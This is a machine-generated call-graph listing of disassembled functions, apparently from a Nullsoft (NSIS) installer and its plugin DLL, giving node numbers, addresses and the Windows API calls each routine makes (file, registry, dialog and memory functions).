5179->5084 5181 733b169f lstrcpyW 5180->5181 5182 733b1672 wsprintfW 5180->5182 5185 733b16b8 5181->5185 5182->5185 5185->5087 5187 733b2626 5186->5187 5188 733b1931 5186->5188 5187->5188 5189 733b2642 GlobalFree 5187->5189 5188->5094 5188->5095 5189->5187 5191 733b1312 2 API calls 5190->5191 5192 733b15fe 5191->5192 5192->5089 5193->5100 5194->5124 5196 733b164d 5195->5196 5196->5126 5203 733b12bb GlobalAlloc 5197->5203 5199 733b12db lstrcpynW 5199->5114 5200->5131 5201->5122 5202->5127 5203->5199 5205 733b1361 5204->5205 5206 733b12cc 2 API calls 5205->5206 5207 733b137f 5206->5207 5207->5139 5209 733b2808 5208->5209 5210 733b27b2 VirtualAlloc 5208->5210 5209->5140 5210->5209 5212 733b2b4d 5211->5212 5213 733b2b5d 5212->5213 5214 733b2b52 GetLastError 5212->5214 5213->5146 5214->5213 5215->5169 5217 733b138a 5216->5217 5218 733b13ac 5216->5218 5217->5218 5219 733b1390 lstrcpyW 5217->5219 5218->5169 5219->5218 5220->5174 5460 402b5e 5461 402bb0 5460->5461 5462 402b65 5460->5462 5463 406a76 5 API calls 5461->5463 5465 402d89 21 API calls 5462->5465 5466 402bae 5462->5466 5464 402bb7 5463->5464 5467 402dab 21 API calls 5464->5467 5468 402b73 5465->5468 5469 402bc0 5467->5469 5470 402d89 21 API calls 5468->5470 5469->5466 5471 402bc4 IIDFromString 5469->5471 5473 402b7f 5470->5473 5471->5466 5472 402bd3 5471->5472 5472->5466 5478 406682 lstrcpynW 5472->5478 5477 4065c9 wsprintfW 5473->5477 5476 402bf0 CoTaskMemFree 5476->5466 5477->5466 5478->5476 5479 402a60 5480 402d89 21 API calls 5479->5480 5481 402a66 5480->5481 5482 402933 5481->5482 5483 402aa9 5481->5483 5484 402a8d 5481->5484 5487 402ac3 5483->5487 5488 402ab3 5483->5488 5485 402a92 5484->5485 5486 402aa3 5484->5486 5493 406682 lstrcpynW 5485->5493 5494 4065c9 wsprintfW 5486->5494 5490 4066bf 21 API calls 5487->5490 5489 402d89 21 API calls 5488->5489 5489->5482 5490->5482 5493->5482 5494->5482 4314 401761 4320 402dab 4314->4320 4318 40176f 4319 4061a1 2 API calls 4318->4319 4319->4318 4321 402db7 4320->4321 4322 4066bf 21 API calls 4321->4322 4323 402dd8 4322->4323 4324 401768 4323->4324 4325 406930 5 API calls 4323->4325 4326 4061a1 4324->4326 4325->4324 4327 4061ae GetTickCount GetTempFileNameW 4326->4327 4328 4061e4 4327->4328 4329 4061e8 4327->4329 4328->4327 4328->4329 4329->4318 5495 401d62 5496 402d89 21 API calls 5495->5496 5497 401d73 SetWindowLongW 5496->5497 5498 402c2f 5497->5498 5499 4028e3 5500 4028eb 5499->5500 5501 4028ef FindNextFileW 5500->5501 5503 402901 5500->5503 5502 402948 5501->5502 5501->5503 5505 406682 lstrcpynW 5502->5505 5505->5503 5506 401568 5507 402ba9 5506->5507 5510 4065c9 wsprintfW 5507->5510 5509 402bae 5510->5509 5518 40196d 5519 402d89 21 API calls 5518->5519 5520 401974 5519->5520 5521 402d89 21 API calls 5520->5521 5522 401981 5521->5522 5523 402dab 21 API calls 5522->5523 5524 401998 lstrlenW 5523->5524 5525 4019a9 5524->5525 5526 4019ea 5525->5526 5530 406682 lstrcpynW 5525->5530 5528 4019da 5528->5526 5529 4019df lstrlenW 5528->5529 5529->5526 5530->5528 5531 40506e GetDlgItem GetDlgItem 5532 4050c0 7 API calls 5531->5532 5543 4052e5 5531->5543 5533 405167 DeleteObject 5532->5533 5534 40515a SendMessageW 5532->5534 5535 405170 5533->5535 5534->5533 5537 4051a7 5535->5537 5538 4066bf 21 API calls 5535->5538 5536 4053c7 5540 405473 5536->5540 5546 405420 SendMessageW 5536->5546 5574 4052d8 5536->5574 5539 404601 22 API calls 5537->5539 5544 405189 SendMessageW SendMessageW 5538->5544 5545 4051bb 5539->5545 5541 405485 5540->5541 5542 40547d SendMessageW 5540->5542 5554 405497 ImageList_Destroy 5541->5554 5555 40549e 5541->5555 5559 4054ae 5541->5559 5542->5541 5543->5536 5566 405354 5543->5566 5585 404fbc SendMessageW 5543->5585 5544->5535 5550 404601 22 API calls 5545->5550 5552 405435 SendMessageW 5546->5552 5546->5574 5547 4053b9 SendMessageW 5547->5536 5548 404668 8 API calls 5553 405674 5548->5553 5558 4051cc 5550->5558 5551 405628 5561 40563a ShowWindow GetDlgItem ShowWindow 5551->5561 5551->5574 5560 405448 5552->5560 5554->5555 5557 4054a7 GlobalFree 5555->5557 5555->5559 5556 4052a7 GetWindowLongW SetWindowLongW 5562 4052c0 5556->5562 5557->5559 5558->5556 5567 40521f SendMessageW 5558->5567 5569 4052a2 5558->5569 5571 405271 SendMessageW 5558->5571 5572 40525d SendMessageW 5558->5572 5559->5551 5578 4054e9 5559->5578 5590 40503c 5559->5590 5568 405459 SendMessageW 5560->5568 5561->5574 5563 4052c5 ShowWindow 5562->5563 5564 4052dd 5562->5564 5583 404636 SendMessageW 5563->5583 5584 404636 SendMessageW 5564->5584 5566->5536 5566->5547 5567->5558 5568->5540 5569->5556 5569->5562 5571->5558 5572->5558 5574->5548 5575 4055f3 5576 4055fe InvalidateRect 5575->5576 5579 40560a 5575->5579 5576->5579 5577 405517 SendMessageW 5582 40552d 5577->5582 5578->5577 5578->5582 5579->5551 5599 404f77 5579->5599 5581 4055a1 SendMessageW SendMessageW 5581->5582 5582->5575 5582->5581 5583->5574 5584->5543 5586 40501b SendMessageW 5585->5586 5587 404fdf GetMessagePos ScreenToClient SendMessageW 5585->5587 5588 405013 5586->5588 5587->5588 5589 405018 5587->5589 5588->5566 5589->5586 5602 406682 lstrcpynW 5590->5602 5592 40504f 5603 4065c9 wsprintfW 5592->5603 5594 405059 5595 40140b 2 API calls 5594->5595 5596 405062 5595->5596 5604 406682 lstrcpynW 5596->5604 5598 405069 5598->5578 5605 404eae 5599->5605 5601 404f8c 5601->5551 5602->5592 5603->5594 5604->5598 5606 404ec7 5605->5606 5607 4066bf 21 API calls 5606->5607 5608 404f2b 5607->5608 5609 4066bf 21 API calls 5608->5609 5610 404f36 5609->5610 5611 4066bf 21 API calls 5610->5611 5612 404f4c lstrlenW wsprintfW SetDlgItemTextW 5611->5612 5612->5601 5613 40166f 5614 402dab 21 API calls 5613->5614 5615 401675 5614->5615 5616 4069df 2 API calls 5615->5616 5617 40167b 5616->5617 5618 402af0 5619 402d89 21 API calls 5618->5619 5620 402af6 5619->5620 5621 4066bf 21 API calls 5620->5621 5622 402933 5620->5622 5621->5622 4904 4026f1 4905 402d89 21 API calls 4904->4905 4913 402700 4905->4913 4906 40283d 4907 40274a ReadFile 4907->4906 4907->4913 4908 4027e3 4908->4906 4908->4913 4918 406253 SetFilePointer 4908->4918 4909 4061f5 ReadFile 4909->4913 4911 40278a MultiByteToWideChar 4911->4913 4912 40283f 4927 4065c9 wsprintfW 4912->4927 4913->4906 4913->4907 4913->4908 4913->4909 4913->4911 4913->4912 4915 4027b0 SetFilePointer MultiByteToWideChar 4913->4915 4917 402850 4913->4917 4915->4913 4916 402871 SetFilePointer 4916->4906 4917->4906 4917->4916 4919 40626f 4918->4919 4924 406287 4918->4924 4920 4061f5 ReadFile 4919->4920 4921 40627b 4920->4921 4922 406290 SetFilePointer 4921->4922 4923 4062b8 SetFilePointer 4921->4923 4921->4924 4922->4923 4925 40629b 4922->4925 4923->4924 4924->4908 4926 406224 WriteFile 4925->4926 4926->4924 4927->4906 5623 404771 lstrlenW 5624 404790 5623->5624 5625 404792 WideCharToMultiByte 5623->5625 5624->5625 5626 404af2 5627 404b1e 5626->5627 5628 404b2f 5626->5628 5687 405cc6 GetDlgItemTextW 5627->5687 5630 404b3b GetDlgItem 5628->5630 5634 404b9a 5628->5634 5633 404b4f 5630->5633 5631 404c7e 5685 404e2d 5631->5685 5689 405cc6 GetDlgItemTextW 5631->5689 5632 404b29 5635 406930 5 API calls 5632->5635 5636 404b63 SetWindowTextW 5633->5636 5639 405ffc 4 API calls 5633->5639 5634->5631 5641 4066bf 21 API calls 5634->5641 5634->5685 5635->5628 5640 404601 22 API calls 5636->5640 5638 404668 8 API calls 5643 404e41 5638->5643 5644 404b59 5639->5644 5645 404b7f 5640->5645 5646 404c0e SHBrowseForFolderW 5641->5646 5642 404cae 5647 406059 18 API calls 5642->5647 5644->5636 5651 405f51 3 API calls 5644->5651 5648 404601 22 API calls 5645->5648 5646->5631 5649 404c26 CoTaskMemFree 5646->5649 5650 404cb4 5647->5650 5652 404b8d 5648->5652 5653 405f51 3 API calls 5649->5653 5690 406682 lstrcpynW 5650->5690 5651->5636 5688 404636 SendMessageW 5652->5688 5655 404c33 5653->5655 5658 404c6a SetDlgItemTextW 5655->5658 5662 4066bf 21 API calls 5655->5662 5657 404b93 5660 406a76 5 API calls 5657->5660 5658->5631 5659 404ccb 5661 406a76 5 API calls 5659->5661 5660->5634 5670 404cd2 5661->5670 5664 404c52 lstrcmpiW 5662->5664 5663 404d13 5691 406682 lstrcpynW 5663->5691 5664->5658 5665 404c63 lstrcatW 5664->5665 5665->5658 5667 404d1a 5668 405ffc 4 API calls 5667->5668 5669 404d20 GetDiskFreeSpaceW 5668->5669 5672 404d44 MulDiv 5669->5672 5674 404d6b 5669->5674 5670->5663 5673 405f9d 2 API calls 5670->5673 5670->5674 5672->5674 5673->5670 5675 404ddc 5674->5675 5677 404f77 24 API calls 5674->5677 5676 404dff 5675->5676 5678 40140b 2 API calls 5675->5678 5692 404623 EnableWindow 5676->5692 5679 404dc9 5677->5679 5678->5676 5681 404dde SetDlgItemTextW 5679->5681 5682 404dce 5679->5682 5681->5675 5684 404eae 24 API calls 5682->5684 5683 404e1b 5683->5685 5686 404a4b SendMessageW 5683->5686 5684->5675 5685->5638 5686->5685 5687->5632 5688->5657 5689->5642 5690->5659 5691->5667 5692->5683 4928 401774 4929 402dab 21 API calls 4928->4929 4930 40177b 4929->4930 4931 4017a3 4930->4931 4932 40179b 4930->4932 4969 406682 lstrcpynW 4931->4969 4968 406682 lstrcpynW 4932->4968 4935 4017ae 4937 405f51 3 API calls 4935->4937 4936 4017a1 4939 406930 5 API calls 4936->4939 4938 4017b4 lstrcatW 4937->4938 4938->4936 4946 4017c0 4939->4946 4940 4069df 2 API calls 4940->4946 4941 4017fc 4943 40614d 2 API calls 4941->4943 4943->4946 4944 4017d2 CompareFileTime 4944->4946 4945 401892 4947 405707 28 API calls 4945->4947 4946->4940 4946->4941 4946->4944 4946->4945 4949 406682 lstrcpynW 4946->4949 4955 4066bf 21 API calls 4946->4955 4964 405ce2 MessageBoxIndirectW 4946->4964 4966 401869 4946->4966 4967 406172 GetFileAttributesW CreateFileW 4946->4967 4950 40189c 4947->4950 4948 405707 28 API calls 4951 40187e 4948->4951 4949->4946 4952 403376 48 API calls 4950->4952 4953 4018af 4952->4953 4954 4018c3 SetFileTime 4953->4954 4956 4018d5 CloseHandle 4953->4956 4954->4956 4955->4946 4956->4951 4957 4018e6 4956->4957 4958 4018eb 4957->4958 4959 4018fe 4957->4959 4960 4066bf 21 API calls 4958->4960 4961 4066bf 21 API calls 4959->4961 4962 4018f3 lstrcatW 4960->4962 4963 401906 4961->4963 4962->4963 4963->4951 4965 405ce2 MessageBoxIndirectW 4963->4965 4964->4946 4965->4951 4966->4948 4966->4951 4967->4946 4968->4936 4969->4935 5693 4014f5 SetForegroundWindow 5694 402c2f 5693->5694 5695 733b170d 5696 733b15b6 GlobalFree 5695->5696 5698 733b1725 5696->5698 5697 733b176b GlobalFree 5698->5697 5699 733b1740 5698->5699 5700 733b1757 VirtualFree 5698->5700 5699->5697 5700->5697 5701 401a77 5702 402d89 21 API calls 5701->5702 5703 401a80 5702->5703 5704 402d89 21 API calls 5703->5704 5705 401a25 5704->5705 5706 401578 5707 401591 5706->5707 5708 401588 ShowWindow 5706->5708 5709 402c2f 5707->5709 5710 40159f ShowWindow 5707->5710 5708->5707 5710->5709 5020 4023f9 5021 402dab 21 API calls 5020->5021 5022 402408 5021->5022 5023 402dab 21 API calls 5022->5023 5024 402411 5023->5024 5025 402dab 21 API calls 5024->5025 5026 40241b GetPrivateProfileStringW 5025->5026 5711 40567b 5712 40568b 5711->5712 5713 40569f 5711->5713 5716 405691 5712->5716 5723 4056e8 5712->5723 5714 4056be 5713->5714 5715 4056a7 IsWindowVisible 5713->5715 5718 4056ed CallWindowProcW 5714->5718 5722 40503c 4 API calls 5714->5722 5717 4056b4 5715->5717 5715->5723 5719 40464d SendMessageW 5716->5719 5720 404fbc 5 API calls 5717->5720 5721 40569b 5718->5721 5719->5721 5720->5714 5722->5723 5723->5718 5724 733b1000 5725 733b101b 5 API calls 5724->5725 5726 733b1019 5725->5726 5727 401ffb 5728 402dab 21 API calls 5727->5728 5729 402002 5728->5729 5730 4069df 2 API calls 5729->5730 5731 402008 5730->5731 5733 402019 5731->5733 5734 4065c9 wsprintfW 5731->5734 5734->5733 5735 401b7c 5736 402dab 21 API calls 5735->5736 5737 401b83 5736->5737 5738 402d89 21 API calls 5737->5738 5739 401b8c wsprintfW 5738->5739 5740 402c2f 5739->5740 5741 401000 5742 401037 BeginPaint GetClientRect 5741->5742 5743 40100c DefWindowProcW 5741->5743 5745 4010f3 5742->5745 5746 401179 5743->5746 5747 401073 CreateBrushIndirect FillRect DeleteObject 5745->5747 5748 4010fc 5745->5748 5747->5745 5749 401102 CreateFontIndirectW 5748->5749 5750 401167 EndPaint 5748->5750 5749->5750 5751 401112 6 API calls 5749->5751 5750->5746 5751->5750 5752 401680 5753 402dab 21 API calls 5752->5753 5754 401687 5753->5754 5755 402dab 21 API calls 5754->5755 5756 401690 5755->5756 5757 402dab 21 API calls 5756->5757 5758 401699 MoveFileW 5757->5758 5759 4016ac 5758->5759 5765 4016a5 5758->5765 5760 4022fb 5759->5760 5762 4069df 2 API calls 5759->5762 5761 401423 28 API calls 5761->5760 5763 4016bb 5762->5763 5763->5760 5764 406442 40 API calls 5763->5764 5764->5765 5765->5761 5766 733b1979 5767 733b199c 5766->5767 5768 733b19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5767->5768 5769 733b19d1 GlobalFree 5767->5769 5770 733b1312 2 API calls 5768->5770 5769->5768 5771 733b1b6e GlobalFree GlobalFree 5770->5771 5772 404102 5773 40411a 5772->5773 5774 40427b 5772->5774 5773->5774 5775 404126 5773->5775 5776 40428c GetDlgItem GetDlgItem 5774->5776 5785 4042cc 5774->5785 5777 404131 SetWindowPos 5775->5777 5778 404144 5775->5778 5779 404601 22 API calls 5776->5779 5777->5778 5782 40414d ShowWindow 5778->5782 5783 40418f 5778->5783 5784 4042b6 SetClassLongW 5779->5784 5780 404326 5781 40464d SendMessageW 5780->5781 5835 404276 5780->5835 5833 404338 5781->5833 5786 40416d GetWindowLongW 5782->5786 5811 404239 5782->5811 5787 404197 DestroyWindow 5783->5787 5788 4041ae 5783->5788 5789 40140b 2 API calls 5784->5789 5785->5780 5790 401389 2 API calls 5785->5790 5792 404186 ShowWindow 5786->5792 5786->5811 5797 40458a 5787->5797 5793 4041b3 SetWindowLongW 5788->5793 5794 4041c4 5788->5794 5789->5785 5795 4042fe 5790->5795 5791 404668 8 API calls 5791->5835 5792->5783 5793->5835 5799 4041d0 GetDlgItem 5794->5799 5794->5811 5795->5780 5800 404302 SendMessageW 5795->5800 5796 40140b 2 API calls 5796->5833 5801 4045bb ShowWindow 5797->5801 5797->5835 5798 40458c DestroyWindow EndDialog 5798->5797 5802 4041e1 SendMessageW IsWindowEnabled 5799->5802 5803 4041fe 5799->5803 5800->5835 5801->5835 5802->5803 5802->5835 5805 40420b 5803->5805 5806 404252 SendMessageW 5803->5806 5807 40421e 5803->5807 5815 404203 5803->5815 5804 4066bf 21 API calls 5804->5833 5805->5806 5805->5815 5806->5811 5809 404226 5807->5809 5810 40423b 5807->5810 5808 4045da SendMessageW 5808->5811 5812 40140b 2 API calls 5809->5812 5813 40140b 2 API calls 5810->5813 5811->5791 5812->5815 5813->5815 5814 404601 22 API calls 5814->5833 5815->5808 5815->5811 5816 404601 22 API calls 5817 4043b3 GetDlgItem 5816->5817 5818 4043d0 ShowWindow EnableWindow 5817->5818 5819 4043c8 5817->5819 5843 404623 EnableWindow 5818->5843 5819->5818 5821 4043fa EnableWindow 5826 40440e 5821->5826 5822 404413 GetSystemMenu EnableMenuItem SendMessageW 5823 404443 SendMessageW 5822->5823 5822->5826 5823->5826 5825 4040e3 22 API calls 5825->5826 5826->5822 5826->5825 5844 404636 SendMessageW 5826->5844 5845 406682 lstrcpynW 5826->5845 5828 404472 lstrlenW 5829 4066bf 21 API calls 5828->5829 5830 404488 SetWindowTextW 5829->5830 5831 401389 2 API calls 5830->5831 5831->5833 5832 4044cc DestroyWindow 5832->5797 5834 4044e6 CreateDialogParamW 5832->5834 5833->5796 5833->5798 5833->5804 5833->5814 5833->5816 5833->5832 5833->5835 5834->5797 5836 404519 5834->5836 5837 404601 22 API calls 5836->5837 5838 404524 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5837->5838 5839 401389 2 API calls 5838->5839 5840 40456a 5839->5840 5840->5835 5841 404572 ShowWindow 5840->5841 5842 40464d SendMessageW 5841->5842 5842->5797 5843->5821 5844->5826 5845->5828 5846 401503 5847 401508 5846->5847 5849 401520 5846->5849 5848 402d89 21 API calls 5847->5848 5848->5849 4350 733b2a7f 4351 733b2acf 4350->4351 4352 733b2a8f VirtualProtect 4350->4352 4352->4351 5850 401a04 5851 402dab 21 API calls 5850->5851 5852 401a0b 5851->5852 5853 402dab 21 API calls 5852->5853 5854 401a14 5853->5854 5855 401a1b lstrcmpiW 5854->5855 5856 401a2d lstrcmpW 5854->5856 5857 401a21 5855->5857 5856->5857 5858 402304 5859 402dab 21 API calls 5858->5859 5860 40230a 5859->5860 5861 402dab 21 API calls 5860->5861 5862 402313 5861->5862 5863 402dab 21 API calls 5862->5863 5864 40231c 5863->5864 5865 4069df 2 API calls 5864->5865 5866 402325 5865->5866 5867 402336 lstrlenW lstrlenW 5866->5867 5868 402329 5866->5868 5869 405707 28 API calls 5867->5869 5870 405707 28 API calls 5868->5870 5872 402331 5868->5872 5871 402374 SHFileOperationW 5869->5871 5870->5872 5871->5868 5871->5872 5880 401d86 5881 401d99 GetDlgItem 5880->5881 5882 401d8c 5880->5882 5884 401d93 5881->5884 5883 402d89 21 API calls 5882->5883 5883->5884 5885 401dda GetClientRect LoadImageW SendMessageW 5884->5885 5886 402dab 21 API calls 5884->5886 5888 401e38 5885->5888 5890 401e44 5885->5890 5886->5885 5889 401e3d DeleteObject 5888->5889 5888->5890 5889->5890 5891 402388 5892 40238f 5891->5892 5895 4023a2 5891->5895 5893 4066bf 21 API calls 5892->5893 5894 40239c 5893->5894 5894->5895 5896 405ce2 MessageBoxIndirectW 5894->5896 5896->5895 4854 401389 4855 401390 4854->4855 4856 4013fe 4855->4856 4857 4013cb MulDiv SendMessageW 4855->4857 4857->4855 5897 402c0a SendMessageW 5898 402c24 InvalidateRect 5897->5898 5899 402c2f 5897->5899 5898->5899 4879 40248f 4880 402dab 21 API calls 4879->4880 4881 4024a1 4880->4881 4882 402dab 21 API calls 4881->4882 4883 4024ab 4882->4883 4896 402e3b 4883->4896 4886 402c2f 4887 4024e3 4889 4024ef 4887->4889 4892 402d89 21 API calls 4887->4892 4888 402dab 21 API calls 4891 4024d9 lstrlenW 4888->4891 4890 40250e RegSetValueExW 4889->4890 4893 403376 48 API calls 4889->4893 4894 402524 RegCloseKey 4890->4894 4891->4887 4892->4889 4893->4890 4894->4886 4897 402e56 4896->4897 4900 40651d 4897->4900 4901 40652c 4900->4901 4902 4024bb 4901->4902 4903 406537 RegCreateKeyExW 4901->4903 4902->4886 4902->4887 4902->4888 4903->4902 5900 733b1774 5901 733b17a3 5900->5901 5902 733b1bff 22 API calls 5901->5902 5903 733b17aa 5902->5903 5904 733b17bd 5903->5904 5905 733b17b1 5903->5905 5906 733b17c7 5904->5906 5907 733b17e4 5904->5907 5908 733b1312 2 API calls 5905->5908 5909 733b15dd 3 API calls 5906->5909 5910 733b17ea 5907->5910 5911 733b180e 5907->5911 5912 733b17bb 5908->5912 5914 733b17cc 5909->5914 5915 733b1654 3 API calls 5910->5915 5913 733b15dd 3 API calls 5911->5913 5913->5912 5916 733b1654 3 API calls 5914->5916 5917 733b17ef 5915->5917 5918 733b17d2 5916->5918 5919 733b1312 2 API calls 5917->5919 5920 733b1312 2 API calls 5918->5920 5921 733b17f5 GlobalFree 5919->5921 5922 733b17d8 GlobalFree 5920->5922 5921->5912 5923 733b1809 GlobalFree 5921->5923 5922->5912 5923->5912 5924 402910 5925 402dab 21 API calls 5924->5925 5926 402917 FindFirstFileW 5925->5926 5927 40293f 5926->5927 5931 40292a 5926->5931 5928 402948 5927->5928 5932 4065c9 wsprintfW 5927->5932 5933 406682 lstrcpynW 5928->5933 5932->5928 5933->5931 5934 401911 5935 401948 5934->5935 5936 402dab 21 API calls 5935->5936 5937 40194d 5936->5937 5938 405d8e 71 API calls 5937->5938 5939 401956 5938->5939 5940 401491 5941 405707 28 API calls 5940->5941 5942 401498 5941->5942 5943 403d12 5944 403d1d 5943->5944 5945 403d21 5944->5945 5946 403d24 GlobalAlloc 5944->5946 5946->5945 5947 733b23e9 5948 733b2453 5947->5948 5949 733b245e GlobalAlloc 5948->5949 5950 733b247d 5948->5950 5949->5948 5958 401914 5959 402dab 21 API calls 5958->5959 5960 40191b 5959->5960 5961 405ce2 MessageBoxIndirectW 5960->5961 5962 401924 5961->5962 4970 402896 4971 40289d 4970->4971 4973 402bae 4970->4973 4972 402d89 21 API calls 4971->4972 4974 4028a4 4972->4974 4975 4028b3 SetFilePointer 4974->4975 4975->4973 4976 4028c3 4975->4976 4978 4065c9 wsprintfW 4976->4978 4978->4973 5963 401f17 5964 402dab 21 API calls 5963->5964 5965 401f1d 5964->5965 5966 402dab 21 API calls 5965->5966 5967 401f26 5966->5967 5968 402dab 21 API calls 5967->5968 5969 401f2f 5968->5969 5970 402dab 21 API calls 5969->5970 5971 401f38 5970->5971 5972 401423 28 API calls 5971->5972 5973 401f3f 5972->5973 5980 405ca8 ShellExecuteExW 5973->5980 5975 401f87 5976 402933 5975->5976 5977 406b21 5 API calls 5975->5977 5978 401fa4 CloseHandle 5977->5978 5978->5976 5980->5975 5981 402f98 5982 402faa SetTimer 5981->5982 5984 402fc3 5981->5984 5982->5984 5983 403011 5984->5983 5985 403017 MulDiv 5984->5985 5986 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 5985->5986 5986->5983 5988 733b10e1 5998 733b1111 5988->5998 5989 733b12b0 GlobalFree 5990 733b1240 GlobalFree 5990->5998 5991 733b11d7 GlobalAlloc 5991->5998 5992 733b12ab 5992->5989 5993 733b135a 2 API calls 5993->5998 5994 733b129a GlobalFree 5994->5998 5995 733b1312 2 API calls 5995->5998 5996 733b116b GlobalAlloc 5996->5998 5997 733b1381 lstrcpyW 5997->5998 5998->5989 5998->5990 5998->5991 5998->5992 5998->5993 5998->5994 5998->5995 5998->5996 5998->5997 5999 401d1c 6000 402d89 21 API calls 5999->6000 6001 401d22 IsWindow 6000->6001 6002 401a25 6001->6002 6003 40149e 6004 4023a2 6003->6004 6005 4014ac PostQuitMessage 6003->6005 6005->6004 4236 401ba0 4237 401bf1 4236->4237 4238 401bad 4236->4238 4239 401bf6 4237->4239 4240 401c1b GlobalAlloc 4237->4240 4241 401c36 4238->4241 4246 401bc4 4238->4246 4254 4023a2 4239->4254 4274 406682 lstrcpynW 4239->4274 4255 4066bf 4240->4255 4242 4066bf 21 API calls 4241->4242 4241->4254 4244 40239c 4242->4244 4244->4254 4275 405ce2 4244->4275 4272 406682 lstrcpynW 4246->4272 4247 401c08 GlobalFree 4247->4254 4249 401bd3 4273 406682 lstrcpynW 4249->4273 4252 401be2 4279 406682 lstrcpynW 4252->4279 4270 4066ca 4255->4270 4256 406911 4257 40692a 4256->4257 4302 406682 lstrcpynW 4256->4302 4257->4241 4259 4068e2 lstrlenW 4259->4270 4263 4067db GetSystemDirectoryW 4263->4270 4264 4066bf 15 API calls 4264->4259 4265 4067f1 GetWindowsDirectoryW 4265->4270 4266 4066bf 15 API calls 4266->4270 4267 406883 lstrcatW 4267->4270 4270->4256 4270->4259 4270->4263 4270->4264 4270->4265 4270->4266 4270->4267 4271 406853 SHGetPathFromIDListW CoTaskMemFree 4270->4271 4280 406550 4270->4280 4285 406a76 GetModuleHandleA 4270->4285 4291 406930 4270->4291 4300 4065c9 wsprintfW 4270->4300 4301 406682 lstrcpynW 4270->4301 4271->4270 4272->4249 4273->4252 4274->4247 4276 405cf7 4275->4276 4277 405d43 4276->4277 4278 405d0b MessageBoxIndirectW 4276->4278 4277->4254 4278->4277 4279->4254 4303 4064ef 4280->4303 4283 406584 RegQueryValueExW RegCloseKey 4284 4065b4 4283->4284 4284->4270 4286 406a92 4285->4286 4287 406a9c GetProcAddress 4285->4287 4307 406a06 GetSystemDirectoryW 4286->4307 4290 406aab 4287->4290 4289 406a98 4289->4287 4289->4290 4290->4270 4298 40693d 4291->4298 4292 4069b3 4293 4069b8 CharPrevW 4292->4293 4295 4069d9 4292->4295 4293->4292 4294 4069a6 CharNextW 4294->4292 4294->4298 4295->4270 4297 406992 CharNextW 4297->4298 4298->4292 4298->4294 4298->4297 4299 4069a1 CharNextW 4298->4299 4310 405f7e 4298->4310 4299->4294 4300->4270 4301->4270 4302->4257 4304 4064fe 4303->4304 4305 406502 4304->4305 4306 406507 RegOpenKeyExW 4304->4306 4305->4283 4305->4284 4306->4305 4308 406a28 wsprintfW LoadLibraryExW 4307->4308 4308->4289 4311 405f84 4310->4311 4312 405f9a 4311->4312 4313 405f8b CharNextW 4311->4313 4312->4298 4313->4311 6006 406da0 6008 406c24 6006->6008 6007 40758f 6008->6007 6009 406ca5 GlobalFree 6008->6009 6010 406cae GlobalAlloc 6008->6010 6011 406d25 GlobalAlloc 6008->6011 6012 406d1c GlobalFree 6008->6012 6009->6010 6010->6007 6010->6008 6011->6007 6011->6008 6012->6011 6013 402621 6014 402dab 21 API calls 6013->6014 6015 402628 6014->6015 6018 406172 GetFileAttributesW CreateFileW 6015->6018 6017 402634 6018->6017 4330 4025a3 4342 402deb 4330->4342 4334 4025b6 4335 4025c5 4334->4335 4340 402933 4334->4340 4336 4025d2 RegEnumKeyW 4335->4336 4337 4025de RegEnumValueW 4335->4337 4338 4025fa RegCloseKey 4336->4338 4337->4338 4339 4025f3 4337->4339 4338->4340 4339->4338 4343 402dab 21 API calls 4342->4343 4344 402e02 4343->4344 4345 4064ef RegOpenKeyExW 4344->4345 4346 4025ad 4345->4346 4347 402d89 4346->4347 4348 4066bf 21 API calls 4347->4348 4349 402d9e 4348->4349 4349->4334 6019 733b1058 6021 733b1074 6019->6021 6020 733b10dd 6021->6020 6022 733b15b6 GlobalFree 6021->6022 6023 733b1092 6021->6023 6022->6023 6024 733b15b6 GlobalFree 6023->6024 6025 733b10a2 6024->6025 6026 733b10a9 GlobalSize 6025->6026 6027 733b10b2 6025->6027 6026->6027 6028 733b10c7 6027->6028 6029 733b10b6 GlobalAlloc 6027->6029 6031 733b10d2 GlobalFree 6028->6031 6030 733b15dd 3 API calls 6029->6030 6030->6028 6031->6020 6032 4015a8 6033 402dab 21 API calls 6032->6033 6034 4015af SetFileAttributesW 6033->6034 6035 4015c1 6034->6035 4858 401fa9 4859 402dab 21 API calls 4858->4859 4860 401faf 4859->4860 4861 405707 28 API calls 4860->4861 4862 401fb9 4861->4862 4863 405c65 2 API calls 4862->4863 4864 401fbf 4863->4864 4865 401fe2 CloseHandle 4864->4865 4868 402933 4864->4868 4873 406b21 WaitForSingleObject 4864->4873 4865->4868 4869 401fd4 4870 401fe4 4869->4870 4871 401fd9 4869->4871 4870->4865 4878 4065c9 wsprintfW 4871->4878 4874 406b3b 4873->4874 4875 406b4d GetExitCodeProcess 4874->4875 4876 406ab2 2 API calls 4874->4876 4875->4869 4877 406b42 WaitForSingleObject 4876->4877 4877->4874 4878->4865 6043 404aab 6044 404ae1 6043->6044 6045 404abb 6043->6045 6047 404668 8 API calls 6044->6047 6046 404601 22 API calls 6045->6046 6048 404ac8 SetDlgItemTextW 6046->6048 6049 404aed 6047->6049 6048->6044 6050 40202f 6051 402dab 21 API calls 6050->6051 6052 402036 6051->6052 6053 406a76 5 API calls 6052->6053 6054 402045 6053->6054 6055 402061 GlobalAlloc 6054->6055 6057 4020d1 6054->6057 6056 402075 6055->6056 6055->6057 6058 406a76 5 API calls 6056->6058 6059 40207c 6058->6059 6060 406a76 5 API calls 6059->6060 6061 402086 6060->6061 6061->6057 6065 4065c9 wsprintfW 6061->6065 6063 4020bf 6066 4065c9 wsprintfW 6063->6066 6065->6063 6066->6057 6067 40252f 6068 402deb 21 API calls 6067->6068 6069 402539 6068->6069 6070 402dab 21 API calls 6069->6070 6071 402542 6070->6071 6072 40254d RegQueryValueExW 6071->6072 6075 402933 6071->6075 6073 402573 RegCloseKey 6072->6073 6074 40256d 6072->6074 6073->6075 6074->6073 6078 4065c9 wsprintfW 6074->6078 6078->6073 6079 4021af 6080 402dab 21 API calls 6079->6080 6081 4021b6 6080->6081 6082 402dab 21 API calls 6081->6082 6083 4021c0 6082->6083 6084 402dab 21 API calls 6083->6084 6085 4021ca 6084->6085 6086 402dab 21 API calls 6085->6086 6087 4021d4 6086->6087 6088 402dab 21 API calls 6087->6088 6089 4021de 6088->6089 6090 40221d CoCreateInstance 6089->6090 6091 402dab 21 API calls 6089->6091 6094 40223c 6090->6094 6091->6090 6092 401423 28 API calls 6093 4022fb 6092->6093 6094->6092 6094->6093 6095 401a35 6096 402dab 21 API calls 